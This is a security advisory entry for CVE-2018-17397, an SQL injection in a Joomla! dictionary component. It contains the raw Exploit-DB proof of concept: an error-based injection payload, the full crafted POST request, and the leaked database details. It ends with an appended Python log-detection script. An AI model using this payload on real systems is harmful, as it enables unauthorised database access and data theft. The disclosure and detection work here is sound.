Vendor: AlphaIndex Dictionaries
By: Ihsan Sencan
CVSS: 9.8 (CRITICAL)
CWE: 89 (SQL Injection)
Product Name: AlphaIndex Dictionaries
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: YES
Related CVE: CVE-2018-17397
CPE: a:multiplanet:alphaindex_dictionaries:1.0
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: WiN7_x64/KaLiLinuX_x64
2018

Joomla! Component AlphaIndex Dictionaries 1.0 – SQL Injection

A SQL injection vulnerability exists in Joomla! Component AlphaIndex Dictionaries 1.0. An attacker can send a specially crafted HTTP POST request to the vulnerable application to execute arbitrary SQL commands in the back-end database. The injection point is the 'letter' parameter of the POST request to 'index.php?option=com_aindexdictionaries&task=getArticlesPreview', where injected SQL code alters the query the component runs.

Mitigation:

The vendor has released an update to address this vulnerability. Users are advised to update to the latest version.

Exploit-DB raw data:

# # # # #
# Exploit Title: Joomla! Component AlphaIndex Dictionaries 1.0 - SQL Injection
# Dork: N/A
# Date: 2018-09-24
# Vendor Homepage: http://multiplanet.gr/
# Software Link: https://extensions.joomla.org/extensions/extension/authoring-a-content/alphaindex-dictionaries/
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-17397
# # # # #
# Exploit Author: Ihsan Sencan
# # # # #
# POC: 
# 
# 1)
# http://localhost/[PATH]/index.php?option=com_aindexdictionaries&task=getArticlesPreview
# 
# Parameter: letter=[SQL] (POST)
#  
# Payload: " AND (SELECT 66 FROM(SELECT COUNT(*),CONCAT(CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(SELECT (ELT(66=66 ,1))),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- VerAyari
# 
#  POST /alphaindex-dictionaries/index.php?option=com_aindexdictionaries&task=getArticlesPreview HTTP/1.1
#  Host: localhost
#  User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0
#  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
#  Accept-Language: en-US,en;q=0.5
#  Accept-Encoding: gzip, deflate
#  Cookie: 4d2a26b1a22184c44838ed58a1427b57=a5ebafd40988be7421846f2e1a496b61
#  Connection: keep-alive
#  Upgrade-Insecure-Requests: 1
#  Content-Type: application/x-www-form-urlencoded
#  Content-Length: 200
#  
#  letter=" AND (SELECT 66 FROM(SELECT COUNT(*),CONCAT(CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(SELECT (ELT(66=66 ,1))),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- VerAyari
#  HTTP/1.1 500 Duplicate entry 'multipla_multi@localhost : multipla_dictionary : 10.2.17-MariaDB' for key 'group_key' SQL=SELECT .............
#  Server: nginx admin
#  Date: Mon, 17 Sep 2018 16:15:28 GMT
#  Content-Type: text/html; charset=utf-8
#  Transfer-Encoding: chunked
#  Connection: keep-alive
#  Cache-Control: no-cache
#  Pragma: no-cache
#  
# # # #
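
An added detection example (not part of the original advisory or the Exploit-DB entry): it flags logged requests to the endpoint named above whose `letter` value is not a single character, and responses that carry the database error text shown in the PoC response. The record layout, the finding names and the rule that a legitimate `letter` is one alphanumeric character are assumptions; the sample records are constructed.

```python
from urllib.parse import urlsplit, parse_qs
import re

# Endpoint and parameter named in the advisory.
OPTION, TASK, PARAM = "com_aindexdictionaries", "getArticlesPreview", "letter"
# Database error text as it appears in the PoC response status line.
ERROR_LEAK = re.compile(r"Duplicate entry '.*' for key 'group_key'")

def is_plausible_letter(value):
    # Assumption: a legitimate index value is exactly one letter or digit (any alphabet).
    return len(value) == 1 and value.isalnum()

def classify(method, url, body, status_line):
    """Return the findings for one logged request/response pair."""
    query = parse_qs(urlsplit(url).query)
    if query.get("option") != [OPTION] or query.get("task") != [TASK]:
        return []  # not the affected endpoint
    findings = []
    if method.upper() == "POST":
        # keep_blank_values so an empty letter= is inspected rather than dropped
        values = parse_qs(body, keep_blank_values=True).get(PARAM, [])
        if any(not is_plausible_letter(v) for v in values):
            findings.append("letter-not-single-character")
    if ERROR_LEAK.search(status_line):
        findings.append("sql-error-in-response")
    return findings

ENDPOINT = "/index.php?option=com_aindexdictionaries&task=getArticlesPreview"
# Constructed records (method, URL, form body, response status line); not real traffic.
SAMPLE = [
    ("POST", ENDPOINT, "letter=A", "HTTP/1.1 200 OK"),
    ("POST", ENDPOINT, "letter=%22+AND+%28SELECT+...%29--+x",
     "HTTP/1.1 500 Duplicate entry 'user@host : db : version' for key 'group_key' SQL=SELECT ..."),
    ("GET", "/index.php?option=com_content&view=article&id=1", "", "HTTP/1.1 200 OK"),
]

if __name__ == "__main__":
    for record in SAMPLE:
        print(record[0], record[1], classify(*record))
```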